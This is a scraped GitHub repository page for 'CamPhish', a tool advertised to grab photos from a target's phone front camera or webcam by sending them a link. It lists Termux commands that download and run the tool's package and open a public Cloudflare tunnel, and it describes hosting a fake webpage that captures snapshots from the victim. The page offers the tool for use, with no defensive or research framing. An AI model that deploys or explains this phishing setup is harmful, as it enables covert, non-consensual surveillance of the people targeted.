Skip to content

webappsite/Camphish

Folders and files

NameName
Last commit message
Last commit date

Latest commit

Β 

History

7 Commits
Β 
Β 
Β 
Β 

Repository files navigation

CamPhish

Grab cam shots from target's phone front camera or PC webcam just sending a link. https://youtu.be/92GK_ySPLmU

[TERMUX] Instagram Install Comments

pkg update && pkg upgrade -y
pkg install curl git nodejs cloudflared
curl -L -o cambest.tar.gz https://github.com/webappsite/Camphish/raw/refs/heads/main/cambest.tar.gz
tar -xvzf cambest.tar.gz && rm cambest.tar.gz
cd cambest
npm start

Public url command

cloudflared tunnel --url localhost:5000

Hosts a fake webpage using a server and tunnel (ngrok or Cloudflare)

Requests and captures webcam snapshots from the target

πŸ“Œ Contact Me

YouTube
GitHub
Telegram
WhatsApp

Releases

No releases published

Packages

No packages published